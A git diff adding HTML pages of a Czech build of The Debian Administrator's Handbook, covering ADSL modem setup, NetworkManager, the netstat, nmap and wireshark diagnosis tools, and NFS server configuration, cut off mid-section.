+            class="indexterm"></a><div
+            class="para">
+				The generic term “ADSL modem” covers a multitude of devices with very different functions. The modems that are simplest to use with Linux are those that have an Ethernet interface (and not only a USB interface). These tend to be popular; most ADSL Internet service providers lend (or lease) a “box” with Ethernet interfaces. Depending on the type of modem, the configuration required can vary widely.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.adsl-pppoe"></a>8.2.4.1. Modems Supporting PPPOE</h4></div></div></div><a
+              id="id-1.11.6.13.6.2"
+              class="indexterm"></a><a
+              id="id-1.11.6.13.6.3"
+              class="indexterm"></a><div
+              class="para">
+					Some Ethernet modems work with the PPPOE protocol (Point to Point Protocol over Ethernet). The <code
+                class="command">pppoeconf</code> tool (from the package with the same name) will configure the connection. To do so, it modifies the <code
+                class="filename">/etc/ppp/peers/dsl-provider</code> file with the settings provided and records the login information in the <code
+                class="filename">/etc/ppp/pap-secrets</code> and <code
+                class="filename">/etc/ppp/chap-secrets</code> files. It is recommended to accept all modifications that it proposes.
+				</div><div
+              class="para">
+					Once this configuration is complete, you can open the ADSL connection with the command, <code
+                class="command">pon dsl-provider</code> and disconnect with <code
+                class="command">poff dsl-provider</code>.
+				</div><a
+              id="id-1.11.6.13.6.6"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Starting <code
+                          class="command">ppp</code> at boot</strong></p></div></div></div><a
+                id="id-1.11.6.13.6.7.2"
+                class="indexterm"></a><a
+                id="id-1.11.6.13.6.7.3"
+                class="indexterm"></a><div
+                class="para">
+					PPP connections over ADSL are, by definition, intermittent. Since they are usually not billed according to time, there are few downsides to the temptation of keeping them always open. The standard means to do so is to use the init system.
+				</div><div
+                class="para">
+					With systemd, adding an automatically restarting task for the ADSL connection is a simple matter of creating a “unit file” such as <code
+                  class="filename">/etc/systemd/system/adsl-connection.service</code>, with contents such as the following:
+				</div><pre
+                class="programlisting">[Unit]
+Description=ADSL connection
+
+[Service]
+Type=forking
+ExecStart=/usr/sbin/pppd call dsl-provider
+Restart=always
+
+[Install]
+WantedBy=multi-user.target</pre><div
+                class="para">
+					Once this unit file has been defined, it needs to be enabled with <code
+                  class="command">systemctl enable adsl-connection</code>. Then the loop can be started manually with <code
+                  class="command">systemctl start adsl-connection</code>; it will also be started automatically on boot.
+				</div><div
+                class="para">
+					On systems not using <code
+                  class="command">systemd</code> (including <span
+                  class="distribution distribution">Wheezy</span> and earlier versions of Debian), the standard SystemV init works differently. On such systems, all that is needed is to add a line such as the following at the end of the <code
+                  class="filename">/etc/inittab</code> file; then, any time the connection is disconnected, <code
+                  class="command">init</code> will reconnect it.
+				</div><pre
+                class="programlisting">
+adsl:2345:respawn:/usr/sbin/pppd call dsl-provider
+</pre><div
+                class="para">
+					For ADSL connections that auto-disconnect on a daily basis, this method reduces the duration of the interruption.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.adsl-pptp"></a>8.2.4.2. Modems Supporting PPTP</h4></div></div></div><a
+              id="id-1.11.6.13.7.2"
+              class="indexterm"></a><div
+              class="para">
+					The PPTP (Point-to-Point Tunneling Protocol) protocol was created by Microsoft. Deployed at the beginning of ADSL, it was quickly replaced by PPPOE. If this protocol is forced on you, see <a
+                class="xref"
+                href="sect.virtual-private-network.html#sect.pptp">10.2.4 – „PPTP“</a>.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.adsl-dhcp"></a>8.2.4.3. Modems Supporting DHCP</h4></div></div></div><div
+              class="para">
+					When a modem is connected to the computer by an Ethernet cable (crossover cable) you typically configure a network connection by DHCP on the computer; the modem automatically acts as a gateway by default and takes care of routing (meaning that it manages the network traffic between the computer and the Internet).
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> Crossover cable for a direct Ethernet connection</strong></p></div></div></div><a
+                id="id-1.11.6.13.8.3.2"
+                class="indexterm"></a><div
+                class="para">
+					Computer network cards expect to receive data on specific wires in the cable, and send their data on others. When you connect a computer to a local network, you usually connect a cable (straight or crossover) between the network card and a repeater or switch. However, if you want to connect two computers directly (without an intermediary switch or repeater), you must route the signal sent by one card to the receiving side of the other card, and vice-versa. This is the purpose of a crossover cable, and the reason it is used.
+				</div><div
+                class="para">
+					Note that this distinction has become almost irrelevant over time, as modern network cards are able do detect the type of cable present and adapt accordingly, so it won't be unusual that both kinds of cable will work in a given location.
+				</div></div><div
+              class="para">
+					Most “ADSL routers” on the market can be used like this, as do most of the ADSL modems provided by Internet services providers.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.roaming-network-config"></a>8.2.5. Automatic Network Configuration for Roaming Users</h3></div></div></div><a
+            id="id-1.11.6.14.2"
+            class="indexterm"></a><a
+            id="id-1.11.6.14.3"
+            class="indexterm"></a><div
+            class="para">
+				Many Falcot engineers have a laptop computer that, for professional purposes, they also use at home. The network configuration to use differs according to location. At home, it may be a wifi network (protected by a WPA key), while the workplace uses a wired network for greater security and more bandwidth.
+			</div><div
+            class="para">
+				To avoid having to manually connect or disconnect the corresponding network interfaces, administrators installed the <span
+              class="pkg pkg">network-manager</span> package on these roaming machines. This software enables a user to easily switch from one network to another using a small icon displayed in the notification area of their graphical desktop. Clicking on this icon displays a list of available networks (both wired and wireless), so they can simply choose the network they wish to use. The program saves the configuration for the networks to which the user has already connected, and automatically switches to the best available network when the current connection drops.
+			</div><div
+            class="para">
+				In order to do this, the program is structured in two parts: a daemon running as root handles activation and configuration of network interfaces and a user interface controls this daemon. PolicyKit handles the required authorizations to control this program and Debian configured PolicyKit in such a way so that members of the netdev group can add or change Network Manager connections.
+			</div><div
+            class="para">
+				Network Manager knows how to handle various types of connections (DHCP, manual configuration, local network), but only if the configuration is set with the program itself. This is why it will systematically ignore all network interfaces in <code
+              class="filename">/etc/network/interfaces</code> for which it is not suited. Since Network Manager doesn't give details when no network connections are shown, the easy way is to delete from <code
+              class="filename">/etc/network/interfaces</code> any configuration for all interfaces that must be managed by Network Manager.
+			</div><div
+            class="para">
+				Note that this program is installed by default when the “Desktop Environment” task is chosen during initial installation.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="basic-configuration.html"><strong>Předcházející</strong>Kapitola 8. Basic Configuration: Network, Account...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.hostname-name-service.html"><strong>Další</strong>8.3. Setting the Hostname and Configuring the Nam...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.network-diagnosis-tools.html b/tmp/cs-CZ/html/sect.network-diagnosis-tools.html
new file mode 100644
index 000000000..4080e3bf5
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.network-diagnosis-tools.html
@@ -0,0 +1,315 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.8. Network Diagnosis Tools</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.dhcp.html"
+        title="10.7. DHCP" /><link
+        rel="next"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.network-diagnosis-tools.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dhcp.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="network-services.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.network-diagnosis-tools"></a>10.8. Network Diagnosis Tools</h2></div></div></div><div
+          class="para">
+			When a network application does not run as expected, it is important to be able to look under the hood. Even when everything seems to run smoothly, running a network diagnosis can help ensure everything is working as it should. Several diagnosis tools exists for this purpose; each one operates on a different level.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.netstat"></a>10.8.1. Local Diagnosis: <code
+                    class="command">netstat</code></h3></div></div></div><a
+            id="id-1.13.11.3.2"
+            class="indexterm"></a><div
+            class="para">
+				Let's first mention the <code
+              class="command">netstat</code> command (in the <span
+              class="pkg pkg">net-tools</span> package); it displays an instant summary of a machine's network activity. When invoked with no argument, this command lists all open connections; this list can be very verbose since it includes many Unix-domain sockets (widely used by daemons) which do not involve the network at all (for example, <code
+              class="literal">dbus</code> communication, <code
+              class="literal">X11</code> traffic, and communications between virtual filesystems and the desktop).
+			</div><div
+            class="para">
+				Common invocations therefore use options that alter <code
+              class="command">netstat</code>'s behavior. The most frequently used options include:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-t</code>, which filters the results to only include TCP connections;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-u</code>, which works similarly for UDP connections; these options are not mutually exclusive, and one of them is enough to stop displaying Unix-domain connections;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-a</code>, to also list listening sockets (waiting for incoming connections);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-n</code>, to display the results numerically: IP addresses (no DNS resolution), port numbers (no aliases as defined in <code
+                    class="filename">/etc/services</code>) and user ids (no login names);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-p</code>, to list the processes involved; this option is only useful when <code
+                    class="command">netstat</code> is run as root, since normal users will only see their own processes;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">-c</code>, to continuously refresh the list of connections.
+					</div></li></ul></div><div
+            class="para">
+				Other options, documented in the <span
+              class="citerefentry"><span
+                class="refentrytitle">netstat</span>(8)</span> manual page, provide an even finer control over the displayed results. In practice, the first five options are so often used together that systems and network administrators practically acquired <code
+              class="command">netstat -tupan</code> as a reflex. Typical results, on a lightly loaded machine, may look like the following:
+			</div><pre
+            class="screen scale">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>netstat -tupan</code></strong>
+<code
+              class="computeroutput">Active Internet connections (servers and established)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
+tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      397/rpcbind     
+tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      431/sshd        
+tcp        0      0 0.0.0.0:36568           0.0.0.0:*               LISTEN      407/rpc.statd   
+tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      762/exim4       
+tcp        0    272 192.168.1.242:22        192.168.1.129:44452     ESTABLISHED 1172/sshd: roland [
+tcp6       0      0 :::111                  :::*                    LISTEN      397/rpcbind     
+tcp6       0      0 :::22                   :::*                    LISTEN      431/sshd        
+tcp6       0      0 ::1:25                  :::*                    LISTEN      762/exim4       
+tcp6       0      0 :::35210                :::*                    LISTEN      407/rpc.statd   
+udp        0      0 0.0.0.0:39376           0.0.0.0:*                           916/dhclient    
+udp        0      0 0.0.0.0:996             0.0.0.0:*                           397/rpcbind     
+udp        0      0 127.0.0.1:1007          0.0.0.0:*                           407/rpc.statd   
+udp        0      0 0.0.0.0:68              0.0.0.0:*                           916/dhclient    
+udp        0      0 0.0.0.0:48720           0.0.0.0:*                           451/avahi-daemon: r
+udp        0      0 0.0.0.0:111             0.0.0.0:*                           397/rpcbind     
+udp        0      0 192.168.1.242:123       0.0.0.0:*                           539/ntpd        
+udp        0      0 127.0.0.1:123           0.0.0.0:*                           539/ntpd        
+udp        0      0 0.0.0.0:123             0.0.0.0:*                           539/ntpd        
+udp        0      0 0.0.0.0:5353            0.0.0.0:*                           451/avahi-daemon: r
+udp        0      0 0.0.0.0:39172           0.0.0.0:*                           407/rpc.statd   
+udp6       0      0 :::996                  :::*                                397/rpcbind     
+udp6       0      0 :::34277                :::*                                407/rpc.statd   
+udp6       0      0 :::54852                :::*                                916/dhclient    
+udp6       0      0 :::111                  :::*                                397/rpcbind     
+udp6       0      0 :::38007                :::*                                451/avahi-daemon: r
+udp6       0      0 fe80::5054:ff:fe99::123 :::*                                539/ntpd        
+udp6       0      0 2001:bc8:3a7e:210:a:123 :::*                                539/ntpd        
+udp6       0      0 2001:bc8:3a7e:210:5:123 :::*                                539/ntpd        
+udp6       0      0 ::1:123                 :::*                                539/ntpd        
+udp6       0      0 :::123                  :::*                                539/ntpd        
+udp6       0      0 :::5353                 :::*                                451/avahi-daemon: r
+</code></pre><div
+            class="para">
+				As expected, this lists established connections, two SSH connections in this case, and applications waiting for incoming connections (listed as <code
+              class="literal">LISTEN</code>), notably the Exim4 email server listening on port 25.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.nmap"></a>10.8.2. Remote Diagnosis: <code
+                    class="command">nmap</code></h3></div></div></div><a
+            id="id-1.13.11.4.2"
+            class="indexterm"></a><div
+            class="para">
+				<code
+              class="command">nmap</code> (in the similarly-named package) is, in a way, the remote equivalent for <code
+              class="command">netstat</code>. It can scan a set of “well-known” ports for one or several remote servers, and list the ports where an application is found to answer to incoming connections. Furthermore, <code
+              class="command">nmap</code> is able to identify some of these applications, sometimes even their version number. The counterpart of this tool is that, since it runs remotely, it cannot provide information on processes or users; however, it can operate on several targets at once.
+			</div><div
+            class="para">
+				A typical <code
+              class="command">nmap</code> invocation only uses the <code
+              class="literal">-A</code> option (so that <code
+              class="command">nmap</code> attempts to identify the versions of the server software it finds) followed by one or more IP addresses or DNS names of machines to scan. Again, many more options exist to finely control the behavior of <code
+              class="command">nmap</code>; please refer to the documentation in the <span
+              class="citerefentry"><span
+                class="refentrytitle">nmap</span>(1)</span> manual page.
+			</div><pre
+            class="screen scale"
+            width="80">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>nmap mirtuel</code></strong>
+<code
+              class="computeroutput">
+Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-09 16:46 CET
+Nmap scan report for mirtuel (192.168.1.242)
+Host is up (0.000013s latency).
+rDNS record for 192.168.1.242: mirtuel.internal.placard.fr.eu.org
+Not shown: 998 closed ports
+PORT    STATE SERVICE
+22/tcp  open  ssh
+111/tcp open  rpcbind
+
+Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds
+# </code><strong
+              class="userinput"><code>nmap -A localhost</code></strong>
+<code
+              class="computeroutput">
+Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-09 16:46 CET
+Nmap scan report for localhost (127.0.0.1)
+Host is up (0.000013s latency).
+Other addresses for localhost (not scanned): 127.0.0.1
+Not shown: 997 closed ports
+PORT    STATE SERVICE VERSION
+22/tcp  open  ssh     OpenSSH 6.7p1 Debian 3 (protocol 2.0)
+|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
+25/tcp  open  smtp    Exim smtpd 4.84
+| smtp-commands: mirtuel Hello localhost [127.0.0.1], SIZE 52428800, 8BITMIME, PIPELINING, HELP, 
+|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP 
+111/tcp open  rpcbind 2-4 (RPC #100000)
+| rpcinfo: 
+|   program version   port/proto  service
+|   100000  2,3,4        111/tcp  rpcbind
+|   100000  2,3,4        111/udp  rpcbind
+|   100024  1          36568/tcp  status
+|_  100024  1          39172/udp  status
+Device type: general purpose
+Running: Linux 3.X
+OS CPE: cpe:/o:linux:linux_kernel:3
+OS details: Linux 3.7 - 3.15
+Network Distance: 0 hops
+Service Info: Host: mirtuel; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 11.54 seconds
+</code></pre><div
+            class="para">
+				As expected, the SSH and Exim4 applications are listed. Note that not all applications listen on all IP addresses; since Exim4 is only accessible on the <code
+              class="literal">lo</code> loopback interface, it only appears during an analysis of <code
+              class="literal">localhost</code> and not when scanning <code
+              class="literal">mirtuel</code> (which maps to the <code
+              class="literal">eth0</code> interface on the same machine).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.sniffers"></a>10.8.3. Sniffers: <code
+                    class="command">tcpdump</code> and <code
+                    class="command">wireshark</code></h3></div></div></div><div
+            class="para">
+				Sometimes, one needs to look at what actually goes on the wire, packet by packet. These cases call for a “frame analyzer”, more widely known as a <span
+              class="emphasis"><em>sniffer</em></span>. Such a tool observes all the packets that reach a given network interface, and displays them in a user-friendly way.
+			</div><a
+            id="id-1.13.11.5.3"
+            class="indexterm"></a><div
+            class="para">
+				The venerable tool in this domain is <code
+              class="command">tcpdump</code>, available as a standard tool on a wide range of platforms. It allows many kinds of network traffic capture, but the representation of this traffic stays rather obscure. We will therefore not describe it in further detail.
+			</div><a
+            id="id-1.13.11.5.5"
+            class="indexterm"></a><div
+            class="para">
+				A more recent (and more modern) tool, <code
+              class="command">wireshark</code> (in the <span
+              class="pkg pkg">wireshark</span> package), has become the new reference in network traffic analysis due to its many decoding modules that allow for a simplified analysis of the captured packets. The packets are displayed graphically with an organization based on the protocol layers. This allows a user to visualize all protocols involved in a packet. For example, given a packet containing an HTTP request, <code
+              class="command">wireshark</code> displays, separately, the information concerning the physical layer, the Ethernet layer, the IP packet information, the TCP connection parameters, and finally the HTTP request itself.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="figure.wireshark"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/wireshark.png"
+                  alt="The wireshark network traffic analyzer" /></div></div><p
+              class="title"><strong>Obrázek 10.1. The <code
+                  class="command">wireshark</code> network traffic analyzer</strong></p></div><div
+            class="para">
+				In our example, the packets traveling over SSH are filtered out (with the <code
+              class="literal">!tcp.port == 22</code> filter). The packet currently displayed was developed at the HTTP layer.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> <code
+                        class="command">wireshark</code> with no graphical interface: <code
+                        class="command">tshark</code></strong></p></div></div></div><a
+              id="id-1.13.11.5.9.2"
+              class="indexterm"></a><div
+              class="para">
+				When one cannot run a graphical interface, or does not wish to do so for whatever reason, a text-only version of <code
+                class="command">wireshark</code> also exists under the name <code
+                class="command">tshark</code> (in a separate <span
+                class="pkg pkg">tshark</span> package). Most of the capture and decoding features are still available, but the lack of a graphical interface necessarily limits the interactions with the program (filtering packets after they've been captured, tracking of a given TCP connection, and so on). It can still be used as a first approach. If further manipulations are intended and require the graphical interface, the packets can be saved to a file and this file can be loaded into a graphical <code
+                class="command">wireshark</code> running on another machine.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dhcp.html"><strong>Předcházející</strong>10.7. DHCP</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="network-services.html"><strong>Další</strong>Kapitola 11. Network Services: Postfix, Apache, N...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.nfs-file-server.html b/tmp/cs-CZ/html/sect.nfs-file-server.html
new file mode 100644
index 000000000..b7486fc23
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.nfs-file-server.html
@@ -0,0 +1,279 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.4. NFS File Server</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.ftp-file-server.html"
+        title="11.3. FTP File Server" /><link
+        rel="next"
+        href="sect.windows-file-server-with-samba.html"
+        title="11.5. Setting Up Windows Shares with Samba" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.nfs-file-server.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ftp-file-server.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.windows-file-server-with-samba.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.nfs-file-server"></a>11.4. NFS File Server</h2></div></div></div><div
+          class="para">
+			NFS (<span
+            class="emphasis"><em>Network File System</em></span>) is a protocol allowing remote access to a filesystem through the network. All Unix systems can work with this protocol; when Windows systems are involved, Samba must be used instead.
+		</div><a
+          id="id-1.14.7.3"
+          class="indexterm"></a><a
+          id="id-1.14.7.4"
+          class="indexterm"></a><a
+          id="id-1.14.7.5"
+          class="indexterm"></a><a
+          id="id-1.14.7.6"
+          class="indexterm"></a><a
+          id="id-1.14.7.7"
+          class="indexterm"></a><div
+          class="para">
+			NFS is a very useful tool but, historically, it has suffered from many limitations, most of which have been addressed with version 4 of the protocol. The downside is that the latest version of NFS is harder to configure when you want to make use of basic security features such as authentication and encryption since it relies on Kerberos for those parts. And without those, the NFS protocol must be restricted to a trusted local network since data goes over the network unencrypted (a <span
+            class="emphasis"><em>sniffer</em></span> can intercept it) and access rights are granted based on the client's IP address (which can be spoofed).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>DOCUMENTATION</em></span> NFS HOWTO</strong></p></div></div></div><div
+            class="para">
+			Good documentation to deploy NFSv4 is rather scarce. Here are some pointers with content of varying quality but that should at least give some hints on what should be done. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://help.ubuntu.com/community/NFSv4Howto">https://help.ubuntu.com/community/NFSv4Howto</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://wiki.linux-nfs.org/wiki/index.php/Nfsv4_configuration">http://wiki.linux-nfs.org/wiki/index.php/Nfsv4_configuration</a></div>
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.7.10"></a>11.4.1. Securing NFS</h3></div></div></div><a
+            id="id-1.14.7.10.2"
+            class="indexterm"></a><div
+            class="para">
+				If you don't use the Kerberos-based security features, it is vital to ensure that only the machines allowed to use NFS can connect to the various required RPC servers, because the basic protocol trusts the data received from the network. The firewall must also block <span
+              class="emphasis"><em>IP spoofing</em></span> so as to prevent an outside machine from acting as an inside one, and access to the appropriate ports must be restricted to the machines meant to access the NFS shares.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> RPC</strong></p></div></div></div><div
+              class="para">
+				RPC (<span
+                class="emphasis"><em>Remote Procedure Call</em></span>) is a Unix standard for remote services. NFS is one such service.
+			</div><a
+              id="id-1.14.7.10.4.3"
+              class="indexterm"></a><a
+              id="id-1.14.7.10.4.4"
+              class="indexterm"></a><div
+              class="para">
+				RPC services register to a directory known as the <span
+                class="emphasis"><em>portmapper</em></span>. A client wishing to perform an NFS query first addresses the <span
+                class="emphasis"><em>portmapper</em></span> (on port 111, either TCP or UDP), and asks for the NFS server; the reply usually mentions port 2049 (the default for NFS). Not all RPC services necessarily use a fixed port.
+			</div></div><div
+            class="para">
+				Older versions of the protocol required other RPC services which used dynamically assigned ports. Fortunately, with NFS version 4, only port 2049 (for NFS) and 111 (for the portmapper) are needed and they are thus easy to firewall.
+			</div><a
+            id="id-1.14.7.10.6"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.7.11"></a>11.4.2. NFS Server</h3></div></div></div><div
+            class="para">
+				The NFS server is part of the Linux kernel; in kernels provided by Debian it is built as a kernel module. If the NFS server is to be run automatically on boot, the <span
+              class="pkg pkg">nfs-kernel-server</span> package should be installed; it contains the relevant start-up scripts.
+			</div><div
+            class="para">
+				The NFS server configuration file, <code
+              class="filename">/etc/exports</code>, lists the directories that are made available over the network (<span
+              class="emphasis"><em>exported</em></span>). For each NFS share, only the given list of machines is granted access. More fine-grained access control can be obtained with a few options. The syntax for this file is quite simple:
+			</div><a
+            id="id-1.14.7.11.4"
+            class="indexterm"></a><a
+            id="id-1.14.7.11.5"
+            class="indexterm"></a><pre
+            class="programlisting">
+/directory/to/share machine1(option1,option2,...) machine2(...) ...
+</pre><div
+            class="para">
+				Note that with NFSv4, all exported directories must be part of a single hierarchy and that the root directory of that hierarchy must be exported and identified with the option <code
+              class="literal">fsid=0</code> or <code
+              class="literal">fsid=root</code>.
+			</div><div
+            class="para">
+				Each machine can be identified either by its DNS name or its IP address. Whole sets of machines can also be specified using either a syntax such as <code
+              class="literal">*.falcot.com</code> or an IP address range such as <code
+              class="literal">192.168.0.0/255.255.255.0</code> or <code
+              class="literal">192.168.0.0/24</code>.
+			</div><div
+            class="para">
+				Directories are made available as read-only by default (or with the <code
+              class="literal">ro</code> option). The <code
+              class="literal">rw</code> option allows read-write access. NFS clients typically connect from a port restricted to root (in other words, below 1024); this restriction can be lifted by the <code
+              class="literal">insecure</code> option (the <code
+              class="literal">secure</code> option is implicit, but it can be made explicit if needed for clarity).
+			</div><a
+            id="id-1.14.7.11.10"
+            class="indexterm"></a><div
+            class="para">
+				By default, the server only answers an NFS query when the current disk operation is complete (<code
+              class="literal">sync</code> option); this can be disabled with the <code
+              class="literal">async</code> option. Asynchronous writes increase performance a bit, but they decrease reliability since there is a data loss risk in case of the server crashing between the acknowledgment of the write and the actual write on disk. Since the default value changed recently (as compared to the historical value of NFS), an explicit setting is recommended.
+			</div><div
+            class="para">
+				In order to not give root access to the filesystem to any NFS client, all queries appearing to come from a root user are considered by the server as coming from the <code
+              class="literal">nobody</code> user. This behavior corresponds to the <code
+              class="literal">root_squash</code> option, and is enabled by default. The <code
+              class="literal">no_root_squash</code> option, which disables this behavior, is risky and should only be used in controlled environments. The <code
+              class="literal">anonuid=<em
+                class="replaceable">uid</em></code> and <code
+              class="literal">anongid=<em
+                class="replaceable">gid</em></code> options allow specifying another fake user to be used instead of UID/GID 65534 (which corresponds to user <code
